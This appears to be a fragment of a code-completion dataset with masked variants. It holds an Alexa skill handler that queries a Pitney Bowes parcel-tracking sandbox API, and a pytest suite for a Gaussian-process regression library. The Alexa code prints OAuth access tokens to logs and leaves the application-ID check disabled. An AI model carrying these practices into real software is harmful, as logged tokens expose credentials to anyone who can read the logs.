"step-5": "\"\"\"\nCode for Alexa skill to check PB tracking\n\"\"\"\n\nfrom __future__ import print_function\nimport traceback\nimport requests\nimport os\nimport json\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': \"SessionSpeechlet - \" + title,\n 'content': \"SessionSpeechlet - \" + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome to PB Parcel Tracker\"\n speech_output = \"Please give first 10 digits of tracking number\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please give first 10 digits of tracking number\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying the Alexa Skills Kit sample. \" \\\n \"Have a nice day! \"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n#----- get tracking ------\n\ndef setFirstEleven(intent, session):\n session_attributes = {}\n should_end_session = False\n speech_output = \"Now give remaining digits\"\n reprompt_text = \"Now give the next eleven numbers\"\n try:\n tracking_number_1 = intent['slots']['One']['value']\n tracking_number_2 = intent['slots']['Two']['value']\n tracking_number_3 = intent['slots']['Three']['value']\n tracking_number_4 = intent['slots']['Four']['value']\n tracking_number_5 = intent['slots']['Five']['value']\n tracking_number_6 = intent['slots']['Six']['value']\n tracking_number_7 = intent['slots']['Seven']['value']\n tracking_number_8 = intent['slots']['Eight']['value']\n tracking_number_9 = intent['slots']['Nine']['value']\n tracking_number_10 = intent['slots']['Ten']['value']\n first_ten = \"%s%s%s%s%s%s%s%s%s%s\" % (tracking_number_1, tracking_number_2,tracking_number_3, tracking_number_4,tracking_number_5, tracking_number_6,tracking_number_7, tracking_number_8,tracking_number_9, tracking_number_10)\n session_attributes['first_ten'] = first_ten\n print(\"session after adding first ten--->\")\n print(session_attributes)\n except Exception as app_exception:\n traceback.print_tb\n speech_output = \"There was some problem, Please provide first ten digits of the tracking number\"\n reprompt_text = \"Please say first ten digits of the tracking number\"\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n#----- get tracking ------\n\ndef getParcelStatus(intent, session):\n session_attributes = {}\n should_end_session = True\n speech_output = \"There was some problem in taking your input\"\n reprompt_text = \"Please say remaining digits of the tracking number\"\n try:\n tracking_number_11= intent['slots']['Eleven']['value']\n tracking_number_12 = intent['slots']['Twelve']['value']\n tracking_number_13 = intent['slots']['Thirteen']['value']\n tracking_number_14 = intent['slots']['Fourteen']['value']\n tracking_number_15 = intent['slots']['Fifteen']['value']\n tracking_number_16 = intent['slots']['Sixteen']['value']\n tracking_number_17 = intent['slots']['Seventeen']['value']\n tracking_number_18 = intent['slots']['Eighteen']['value']\n tracking_number_19 = intent['slots']['Nineteen']['value']\n tracking_number_20 = intent['slots']['Twenty']['value']\n tracking_number_21 = intent['slots']['TwentyOne']['value']\n tracking_number_22 = intent['slots']['TwentyTwo']['value']\n tracking_number = \"%s%s%s%s%s%s%s%s%s%s%s%s\" % (tracking_number_11,tracking_number_12, tracking_number_13, tracking_number_14,tracking_number_15, tracking_number_16,tracking_number_17, tracking_number_18,tracking_number_19, tracking_number_20,tracking_number_21, tracking_number_22)\n print(\"'first_ten' not in session['attributes']--->\")\n print('first_ten' not in session['attributes'])\n full_tracking_number = \"%s%s\" % (session['attributes']['first_ten'], tracking_number)\n bearer = \"Bearer %s\" % (session['access_token'])\n print(\"USPS FULL Tracking Number ----> %s\" % (full_tracking_number))\n url = \"https://api-sandbox.pitneybowes.com/shippingservices/v1/tracking/%s?packageIdentifierType=TrackingNumber&carrier=USPS\" %(full_tracking_number)\n r=requests.get(url, headers={\"Authorization\" : bearer})\n tracking_response = {}\n tracking_response = json.loads(r.content)\n if(r.status_code == 200):\n speech_output = \"The status of the parcel is \"+tracking_response['status']\n reprompt_text = \"The status of the parcel is \"+tracking_response['status']\n else:\n speech_output = tracking_response['errors'][0]['errorDescription']\n reprompt_text = tracking_response['errors'][0]['errorDescription']\n print(r.content)\n except Exception as app_exception:\n traceback.print_tb\n should_end_session = False\n if ('attributes' not in session or ('attributes' in session and 'first_ten' not in session['attributes'])):\n speech_output = \"Please provide only first ten digits of the tracking number\"\n reprompt_text = \"Please provide only first ten digits of the tracking number\"\n else:\n speech_output = \"There was some problem, Please say remaining digits of the tracking number\"\n reprompt_text = \"Please say remaining digits of the tracking number\"\n return build_response(session_attributes, build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef oauth_request(session):\n access_key = os.environ['key']\n access_key_value = \"Basic \"+access_key\n url = 'https://api-sandbox.pitneybowes.com/oauth/token'\n r = requests.post(url, headers={\"Authorization\": access_key_value,\n \"Content-Type\": \"application/x-www-form-urlencoded\"},\n data={\"grant_type\": \"client_credentials\"})\n print(r.status_code)\n if(r.status_code == 200):\n j = json.loads(r.content)\n print(j)\n session['access_token'] = j['access_token']\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n if('access_token' not in session):\n oauth_request(session)\n print(session['access_token'])\n # Dispatch to your skill's intent handlers\n if intent_name == \"Tracking\":\n return setFirstEleven(intent, session)\n elif intent_name == \"TrackingSecond\":\n return getParcelStatus(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
import pytest
import os
import pandas as pd
import numpy as np
import math
import scipy
from scipy import stats
from sklearn import metrics, linear_model
from gpmodel import gpkernel
from gpmodel import gpmodel
from gpmodel import gpmean
from gpmodel import chimera_tools
n = 200
d = 10
X = np.random.random(size=(n, d))
xa = X[[0]]
xb = X[[1]]
Xc = X[[2]]
class_Y = np.random.choice((1, -1), size=(n,))
alpha = 1e-1
func = gpmean.GPMean(linear_model.Lasso, alpha=alpha)
X_test = np.random.random(size=(5, d))
kernel = gpkernel.SEKernel()
cov = kernel.cov(X, X, hypers=(1.0, 0.5))
variances = np.random.random(size=(n, ))
Y = np.random.multivariate_normal(np.zeros(n), cov=cov)
Y += np.random.normal(0, 0.2, n)
def test_init():
model = gpmodel.GPRegressor(kernel)
assert np.allclose(model.mean_func.mean(X), np.zeros((len(X), )))
assert model.objective == model._log_ML
assert model.kernel == kernel
assert model.guesses is None
model = gpmodel.GPRegressor(kernel, guesses=(0.1, 0.1, 0.1))
assert model.guesses == (0.1, 0.1, 0.1)
def test_normalize():
model = gpmodel.GPRegressor(kernel)
m, s, normed = model._normalize(Y)
assert np.isclose(m, Y.mean())
assert np.isclose(s, Y.std())
assert np.allclose(normed, (Y - m) / s)
model.std = s
model.mean = m
assert np.allclose(Y, model.unnormalize(normed))
def test_K():
model = gpmodel.GPRegressor(kernel)
model.kernel.fit(X)
K, Ky = model._make_Ks((1, 1, 1))
assert np.allclose(K, kernel.cov(X, X))
assert np.allclose(Ky, K + np.diag(np.ones(len(K))))
model.variances = variances
K, Ky = model._make_Ks((1, 1))
assert np.allclose(K, kernel.cov(X, X))
assert np.allclose(Ky, K + np.diag(variances))
def test_ML():
model = gpmodel.GPRegressor(kernel)
model.kernel.fit(X)
model.normed_Y = model._normalize(Y)[2]
model._ell = len(Y)
hypers = np.random.random(size=(3,))
y_mat = model.normed_Y.reshape((n, 1))
K, Ky = model._make_Ks(hypers)
first = 0.5 * y_mat.T @ np.linalg.inv(Ky) @ y_mat
second = 0.5 * np.log(np.linalg.det(Ky))
third = model._ell / 2.0 * np.log(2 * np.pi)
actual = first + second + third
assert np.isclose(actual, model._log_ML(hypers))
def test_fit():
model = gpmodel.GPRegressor(kernel)
model.fit(X, Y)
assert model._n_hypers == kernel._n_hypers + 1
assert np.allclose(model.X, X)
assert np.allclose(model.Y, Y)
m, s, normed = model._normalize(Y)
assert np.allclose(model.normed_Y, normed)
assert np.isclose(m, model.mean)
assert np.isclose(s, model.std)
vn, s0, ell = model.hypers
K = kernel.cov(X, X, (s0, ell))
Ky = K + np.diag(vn * np.ones(len(K)))
ML = model._log_ML(model.hypers)
L = np.linalg.cholesky(Ky)
alpha = np.linalg.inv(Ky) @ normed.reshape((n, 1))
assert np.isclose(model.ML, ML)
assert np.allclose(model._K, K)
assert np.allclose(model._Ky, Ky)
assert np.allclose(model._L, L)
assert np.allclose(model._alpha, alpha)
def test_predict():
model = gpmodel.GPRegressor(kernel)
model.fit(X, Y)
h = model.hypers[1::]
m, s, normed = model._normalize(Y)
k_star = model.kernel.cov(X_test, X, hypers=h)
k_star_star = model.kernel.cov(X_test, X_test, hypers=h)
K = kernel.cov(X, X, h)
Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))
means = k_star @ np.linalg.inv(Ky) @ normed.reshape(len(Y), 1)
means = means * s + m
var = k_star_star - k_star @ np.linalg.inv(Ky) @ k_star.T
var *= s ** 2
m, v = model.predict(X_test)
print(v)
print(var)
print(model.hypers[0])
assert (np.abs(v - var) < 1e-1).all()
assert np.allclose(means[:, 0], m, rtol=1.e-8, atol=1e-4)
def test_pickles():
model = gpmodel.GPRegressor(kernel)
model.fit(X, Y)
m1, v1 = model.predict(X_test)
model.dump('test.pkl')
new_model = gpmodel.GPRegressor.load('test.pkl')
os.remove('test.pkl')
m2, v2 = new_model.predict(X_test)
assert np.allclose(m1, m2)
assert np.allclose(v1, v2)
if __name__ == "__main__":
test_init()
test_normalize()
test_K()
test_ML()
test_fit()
test_predict()
test_pickles()
# To Do:
# Test LOO_res and LOO_log_p and fitting with LOO_log_p
# Test with mean functions
# Test with given variances
|
normal
|
{
"blob_id": "62c28b5eb31b90191dfbab4456fc5373ba51bf64",
"index": 8869,
"step-1": "<mask token>\n\n\ndef test_normalize():\n model = gpmodel.GPRegressor(kernel)\n m, s, normed = model._normalize(Y)\n assert np.isclose(m, Y.mean())\n assert np.isclose(s, Y.std())\n assert np.allclose(normed, (Y - m) / s)\n model.std = s\n model.mean = m\n assert np.allclose(Y, model.unnormalize(normed))\n\n\ndef test_K():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n K, Ky = model._make_Ks((1, 1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(np.ones(len(K))))\n model.variances = variances\n K, Ky = model._make_Ks((1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(variances))\n\n\ndef test_ML():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n model.normed_Y = model._normalize(Y)[2]\n model._ell = len(Y)\n hypers = np.random.random(size=(3,))\n y_mat = model.normed_Y.reshape((n, 1))\n K, Ky = model._make_Ks(hypers)\n first = 0.5 * y_mat.T @ np.linalg.inv(Ky) @ y_mat\n second = 0.5 * np.log(np.linalg.det(Ky))\n third = model._ell / 2.0 * np.log(2 * np.pi)\n actual = first + second + third\n assert np.isclose(actual, model._log_ML(hypers))\n\n\ndef test_fit():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n assert model._n_hypers == kernel._n_hypers + 1\n assert np.allclose(model.X, X)\n assert np.allclose(model.Y, Y)\n m, s, normed = model._normalize(Y)\n assert np.allclose(model.normed_Y, normed)\n assert np.isclose(m, model.mean)\n assert np.isclose(s, model.std)\n vn, s0, ell = model.hypers\n K = kernel.cov(X, X, (s0, ell))\n Ky = K + np.diag(vn * np.ones(len(K)))\n ML = model._log_ML(model.hypers)\n L = np.linalg.cholesky(Ky)\n alpha = np.linalg.inv(Ky) @ normed.reshape((n, 1))\n assert np.isclose(model.ML, ML)\n assert np.allclose(model._K, K)\n assert np.allclose(model._Ky, Ky)\n assert np.allclose(model._L, L)\n assert np.allclose(model._alpha, alpha)\n\n\ndef test_predict():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n h = model.hypers[1:]\n m, s, normed = model._normalize(Y)\n k_star = model.kernel.cov(X_test, X, hypers=h)\n k_star_star = model.kernel.cov(X_test, X_test, hypers=h)\n K = kernel.cov(X, X, h)\n Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))\n means = k_star @ np.linalg.inv(Ky) @ normed.reshape(len(Y), 1)\n means = means * s + m\n var = k_star_star - k_star @ np.linalg.inv(Ky) @ k_star.T\n var *= s ** 2\n m, v = model.predict(X_test)\n print(v)\n print(var)\n print(model.hypers[0])\n assert (np.abs(v - var) < 0.1).all()\n assert np.allclose(means[:, 0], m, rtol=1e-08, atol=0.0001)\n\n\ndef test_pickles():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n m1, v1 = model.predict(X_test)\n model.dump('test.pkl')\n new_model = gpmodel.GPRegressor.load('test.pkl')\n os.remove('test.pkl')\n m2, v2 = new_model.predict(X_test)\n assert np.allclose(m1, m2)\n assert np.allclose(v1, v2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_init():\n model = gpmodel.GPRegressor(kernel)\n assert np.allclose(model.mean_func.mean(X), np.zeros((len(X),)))\n assert model.objective == model._log_ML\n assert model.kernel == kernel\n assert model.guesses is None\n model = gpmodel.GPRegressor(kernel, guesses=(0.1, 0.1, 0.1))\n assert model.guesses == (0.1, 0.1, 0.1)\n\n\ndef test_normalize():\n model = gpmodel.GPRegressor(kernel)\n m, s, normed = model._normalize(Y)\n assert np.isclose(m, Y.mean())\n assert np.isclose(s, Y.std())\n assert np.allclose(normed, (Y - m) / s)\n model.std = s\n model.mean = m\n assert np.allclose(Y, model.unnormalize(normed))\n\n\ndef test_K():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n K, Ky = model._make_Ks((1, 1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(np.ones(len(K))))\n model.variances = variances\n K, Ky = model._make_Ks((1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(variances))\n\n\ndef test_ML():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n model.normed_Y = model._normalize(Y)[2]\n model._ell = len(Y)\n hypers = np.random.random(size=(3,))\n y_mat = model.normed_Y.reshape((n, 1))\n K, Ky = model._make_Ks(hypers)\n first = 0.5 * y_mat.T @ np.linalg.inv(Ky) @ y_mat\n second = 0.5 * np.log(np.linalg.det(Ky))\n third = model._ell / 2.0 * np.log(2 * np.pi)\n actual = first + second + third\n assert np.isclose(actual, model._log_ML(hypers))\n\n\ndef test_fit():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n assert model._n_hypers == kernel._n_hypers + 1\n assert np.allclose(model.X, X)\n assert np.allclose(model.Y, Y)\n m, s, normed = model._normalize(Y)\n assert np.allclose(model.normed_Y, normed)\n assert np.isclose(m, model.mean)\n assert np.isclose(s, model.std)\n vn, s0, ell = model.hypers\n K = kernel.cov(X, X, (s0, ell))\n Ky = K + np.diag(vn * np.ones(len(K)))\n ML = model._log_ML(model.hypers)\n L = np.linalg.cholesky(Ky)\n alpha = np.linalg.inv(Ky) @ normed.reshape((n, 1))\n assert np.isclose(model.ML, ML)\n assert np.allclose(model._K, K)\n assert np.allclose(model._Ky, Ky)\n assert np.allclose(model._L, L)\n assert np.allclose(model._alpha, alpha)\n\n\ndef test_predict():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n h = model.hypers[1:]\n m, s, normed = model._normalize(Y)\n k_star = model.kernel.cov(X_test, X, hypers=h)\n k_star_star = model.kernel.cov(X_test, X_test, hypers=h)\n K = kernel.cov(X, X, h)\n Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))\n means = k_star @ np.linalg.inv(Ky) @ normed.reshape(len(Y), 1)\n means = means * s + m\n var = k_star_star - k_star @ np.linalg.inv(Ky) @ k_star.T\n var *= s ** 2\n m, v = model.predict(X_test)\n print(v)\n print(var)\n print(model.hypers[0])\n assert (np.abs(v - var) < 0.1).all()\n assert np.allclose(means[:, 0], m, rtol=1e-08, atol=0.0001)\n\n\ndef test_pickles():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n m1, v1 = model.predict(X_test)\n model.dump('test.pkl')\n new_model = gpmodel.GPRegressor.load('test.pkl')\n os.remove('test.pkl')\n m2, v2 = new_model.predict(X_test)\n assert np.allclose(m1, m2)\n assert np.allclose(v1, v2)\n\n\n<mask token>\n",
"step-3": "<mask token>\nY += np.random.normal(0, 0.2, n)\n\n\ndef test_init():\n model = gpmodel.GPRegressor(kernel)\n assert np.allclose(model.mean_func.mean(X), np.zeros((len(X),)))\n assert model.objective == model._log_ML\n assert model.kernel == kernel\n assert model.guesses is None\n model = gpmodel.GPRegressor(kernel, guesses=(0.1, 0.1, 0.1))\n assert model.guesses == (0.1, 0.1, 0.1)\n\n\ndef test_normalize():\n model = gpmodel.GPRegressor(kernel)\n m, s, normed = model._normalize(Y)\n assert np.isclose(m, Y.mean())\n assert np.isclose(s, Y.std())\n assert np.allclose(normed, (Y - m) / s)\n model.std = s\n model.mean = m\n assert np.allclose(Y, model.unnormalize(normed))\n\n\ndef test_K():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n K, Ky = model._make_Ks((1, 1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(np.ones(len(K))))\n model.variances = variances\n K, Ky = model._make_Ks((1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(variances))\n\n\ndef test_ML():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n model.normed_Y = model._normalize(Y)[2]\n model._ell = len(Y)\n hypers = np.random.random(size=(3,))\n y_mat = model.normed_Y.reshape((n, 1))\n K, Ky = model._make_Ks(hypers)\n first = 0.5 * y_mat.T @ np.linalg.inv(Ky) @ y_mat\n second = 0.5 * np.log(np.linalg.det(Ky))\n third = model._ell / 2.0 * np.log(2 * np.pi)\n actual = first + second + third\n assert np.isclose(actual, model._log_ML(hypers))\n\n\ndef test_fit():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n assert model._n_hypers == kernel._n_hypers + 1\n assert np.allclose(model.X, X)\n assert np.allclose(model.Y, Y)\n m, s, normed = model._normalize(Y)\n assert np.allclose(model.normed_Y, normed)\n assert np.isclose(m, model.mean)\n assert np.isclose(s, model.std)\n vn, s0, ell = model.hypers\n K = kernel.cov(X, X, (s0, ell))\n Ky = K + np.diag(vn * np.ones(len(K)))\n ML = model._log_ML(model.hypers)\n L = np.linalg.cholesky(Ky)\n alpha = np.linalg.inv(Ky) @ normed.reshape((n, 1))\n assert np.isclose(model.ML, ML)\n assert np.allclose(model._K, K)\n assert np.allclose(model._Ky, Ky)\n assert np.allclose(model._L, L)\n assert np.allclose(model._alpha, alpha)\n\n\ndef test_predict():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n h = model.hypers[1:]\n m, s, normed = model._normalize(Y)\n k_star = model.kernel.cov(X_test, X, hypers=h)\n k_star_star = model.kernel.cov(X_test, X_test, hypers=h)\n K = kernel.cov(X, X, h)\n Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))\n means = k_star @ np.linalg.inv(Ky) @ normed.reshape(len(Y), 1)\n means = means * s + m\n var = k_star_star - k_star @ np.linalg.inv(Ky) @ k_star.T\n var *= s ** 2\n m, v = model.predict(X_test)\n print(v)\n print(var)\n print(model.hypers[0])\n assert (np.abs(v - var) < 0.1).all()\n assert np.allclose(means[:, 0], m, rtol=1e-08, atol=0.0001)\n\n\ndef test_pickles():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n m1, v1 = model.predict(X_test)\n model.dump('test.pkl')\n new_model = gpmodel.GPRegressor.load('test.pkl')\n os.remove('test.pkl')\n m2, v2 = new_model.predict(X_test)\n assert np.allclose(m1, m2)\n assert np.allclose(v1, v2)\n\n\nif __name__ == '__main__':\n test_init()\n test_normalize()\n test_K()\n test_ML()\n test_fit()\n test_predict()\n test_pickles()\n",
"step-4": "<mask token>\nn = 200\nd = 10\nX = np.random.random(size=(n, d))\nxa = X[[0]]\nxb = X[[1]]\nXc = X[[2]]\nclass_Y = np.random.choice((1, -1), size=(n,))\nalpha = 0.1\nfunc = gpmean.GPMean(linear_model.Lasso, alpha=alpha)\nX_test = np.random.random(size=(5, d))\nkernel = gpkernel.SEKernel()\ncov = kernel.cov(X, X, hypers=(1.0, 0.5))\nvariances = np.random.random(size=(n,))\nY = np.random.multivariate_normal(np.zeros(n), cov=cov)\nY += np.random.normal(0, 0.2, n)\n\n\ndef test_init():\n model = gpmodel.GPRegressor(kernel)\n assert np.allclose(model.mean_func.mean(X), np.zeros((len(X),)))\n assert model.objective == model._log_ML\n assert model.kernel == kernel\n assert model.guesses is None\n model = gpmodel.GPRegressor(kernel, guesses=(0.1, 0.1, 0.1))\n assert model.guesses == (0.1, 0.1, 0.1)\n\n\ndef test_normalize():\n model = gpmodel.GPRegressor(kernel)\n m, s, normed = model._normalize(Y)\n assert np.isclose(m, Y.mean())\n assert np.isclose(s, Y.std())\n assert np.allclose(normed, (Y - m) / s)\n model.std = s\n model.mean = m\n assert np.allclose(Y, model.unnormalize(normed))\n\n\ndef test_K():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n K, Ky = model._make_Ks((1, 1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(np.ones(len(K))))\n model.variances = variances\n K, Ky = model._make_Ks((1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(variances))\n\n\ndef test_ML():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n model.normed_Y = model._normalize(Y)[2]\n model._ell = len(Y)\n hypers = np.random.random(size=(3,))\n y_mat = model.normed_Y.reshape((n, 1))\n K, Ky = model._make_Ks(hypers)\n first = 0.5 * y_mat.T @ np.linalg.inv(Ky) @ y_mat\n second = 0.5 * np.log(np.linalg.det(Ky))\n third = model._ell / 2.0 * np.log(2 * np.pi)\n actual = first + second + third\n assert np.isclose(actual, model._log_ML(hypers))\n\n\ndef test_fit():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n assert model._n_hypers == kernel._n_hypers + 1\n assert np.allclose(model.X, X)\n assert np.allclose(model.Y, Y)\n m, s, normed = model._normalize(Y)\n assert np.allclose(model.normed_Y, normed)\n assert np.isclose(m, model.mean)\n assert np.isclose(s, model.std)\n vn, s0, ell = model.hypers\n K = kernel.cov(X, X, (s0, ell))\n Ky = K + np.diag(vn * np.ones(len(K)))\n ML = model._log_ML(model.hypers)\n L = np.linalg.cholesky(Ky)\n alpha = np.linalg.inv(Ky) @ normed.reshape((n, 1))\n assert np.isclose(model.ML, ML)\n assert np.allclose(model._K, K)\n assert np.allclose(model._Ky, Ky)\n assert np.allclose(model._L, L)\n assert np.allclose(model._alpha, alpha)\n\n\ndef test_predict():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n h = model.hypers[1:]\n m, s, normed = model._normalize(Y)\n k_star = model.kernel.cov(X_test, X, hypers=h)\n k_star_star = model.kernel.cov(X_test, X_test, hypers=h)\n K = kernel.cov(X, X, h)\n Ky = K + np.diag(model.hypers[0] * np.ones(len(K)))\n means = k_star @ np.linalg.inv(Ky) @ normed.reshape(len(Y), 1)\n means = means * s + m\n var = k_star_star - k_star @ np.linalg.inv(Ky) @ k_star.T\n var *= s ** 2\n m, v = model.predict(X_test)\n print(v)\n print(var)\n print(model.hypers[0])\n assert (np.abs(v - var) < 0.1).all()\n assert np.allclose(means[:, 0], m, rtol=1e-08, atol=0.0001)\n\n\ndef test_pickles():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n m1, v1 = model.predict(X_test)\n model.dump('test.pkl')\n new_model = gpmodel.GPRegressor.load('test.pkl')\n os.remove('test.pkl')\n m2, v2 = new_model.predict(X_test)\n assert np.allclose(m1, m2)\n assert np.allclose(v1, v2)\n\n\nif __name__ == '__main__':\n test_init()\n test_normalize()\n test_K()\n test_ML()\n test_fit()\n test_predict()\n test_pickles()\n",
"step-5": "import pytest\nimport os\n\nimport pandas as pd\nimport numpy as np\nimport math\nimport scipy\nfrom scipy import stats\nfrom sklearn import metrics, linear_model\n\nfrom gpmodel import gpkernel\nfrom gpmodel import gpmodel\nfrom gpmodel import gpmean\nfrom gpmodel import chimera_tools\n\nn = 200\nd = 10\nX = np.random.random(size=(n, d))\nxa = X[[0]]\nxb = X[[1]]\nXc = X[[2]]\nclass_Y = np.random.choice((1, -1), size=(n,))\nalpha = 1e-1\nfunc = gpmean.GPMean(linear_model.Lasso, alpha=alpha)\nX_test = np.random.random(size=(5, d))\nkernel = gpkernel.SEKernel()\ncov = kernel.cov(X, X, hypers=(1.0, 0.5))\nvariances = np.random.random(size=(n, ))\nY = np.random.multivariate_normal(np.zeros(n), cov=cov)\nY += np.random.normal(0, 0.2, n)\n\n\ndef test_init():\n model = gpmodel.GPRegressor(kernel)\n assert np.allclose(model.mean_func.mean(X), np.zeros((len(X), )))\n assert model.objective == model._log_ML\n assert model.kernel == kernel\n assert model.guesses is None\n model = gpmodel.GPRegressor(kernel, guesses=(0.1, 0.1, 0.1))\n assert model.guesses == (0.1, 0.1, 0.1)\n\n\ndef test_normalize():\n model = gpmodel.GPRegressor(kernel)\n m, s, normed = model._normalize(Y)\n assert np.isclose(m, Y.mean())\n assert np.isclose(s, Y.std())\n assert np.allclose(normed, (Y - m) / s)\n model.std = s\n model.mean = m\n assert np.allclose(Y, model.unnormalize(normed))\n\n\ndef test_K():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n K, Ky = model._make_Ks((1, 1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(np.ones(len(K))))\n model.variances = variances\n K, Ky = model._make_Ks((1, 1))\n assert np.allclose(K, kernel.cov(X, X))\n assert np.allclose(Ky, K + np.diag(variances))\n\n\ndef test_ML():\n model = gpmodel.GPRegressor(kernel)\n model.kernel.fit(X)\n model.normed_Y = model._normalize(Y)[2]\n model._ell = len(Y)\n hypers = np.random.random(size=(3,))\n y_mat = model.normed_Y.reshape((n, 1))\n K, Ky = model._make_Ks(hypers)\n first = 0.5 * y_mat.T @ np.linalg.inv(Ky) @ y_mat\n second = 0.5 * np.log(np.linalg.det(Ky))\n third = model._ell / 2.0 * np.log(2 * np.pi)\n actual = first + second + third\n assert np.isclose(actual, model._log_ML(hypers))\n\n\ndef test_fit():\n model = gpmodel.GPRegressor(kernel)\n model.fit(X, Y)\n assert model._n_hypers == kernel._n_hypers + 1\n assert np.allclose(model.X, X)\n assert np.allclose(model.Y, Y)\n m, s, normed = model._normalize(Y)\n assert np.allclose(model.normed_Y, normed)\n assert np.isclose(m, model.mean)\n assert np.isclose(s, model.std)\n vn, s0, ell = model.hypers\n K = kernel.cov(X, X, (s0, ell))\n Ky = K + np.diag(vn * np.ones(len(K)))\n ML = model._log_ML(model.hypers)\n L = np.linalg.cholesky(Ky)\n alpha = np.linalg.inv(Ky) @ normed.reshape((n, 1))\n assert 